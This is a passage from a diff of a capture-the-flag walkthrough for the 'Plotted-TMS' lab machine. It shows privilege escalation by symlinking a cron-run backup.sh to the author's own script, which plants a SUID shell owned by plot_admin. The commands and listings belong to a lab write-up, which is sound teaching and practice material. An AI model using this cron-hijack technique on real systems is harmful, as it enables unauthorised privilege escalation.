j-info/ctfsite/walkthroughs/2022-02-19 - Plotted-TMS.md

 And then link **backup.sh** over to my script and make it executable:

 `ln -sf test.sh backup.sh`
+`chmod +x test.sh`

 ```
 lrwxrwxrwx 1 www-data www-data    7 Feb 20 04:44 backup.sh -> test.sh
 -rwxrwxrwx 1 www-data www-data   45 Feb 20 04:43 test.sh
 ```

 I wait for cron to run the backup.sh script which will in turn run my test.sh instead.
-After it runs you can see in **/home/plot_admin** that my newly created shell is there.
-If you look at the user/group it was created under the plot_admin user which is important for the next step.
+After it runs you can see in **/home/plot_admin** that the newly created shell is there.
+If you look at the user/group it was created under it shows as plot_admin which is important for the next step.
+Also notice it has a **SUID** bit set since we instructed our script to do that.

 ```
 -rwsr-sr-x  1 plot_admin plot_admin 1183448 Feb 20 04:47 shell.sh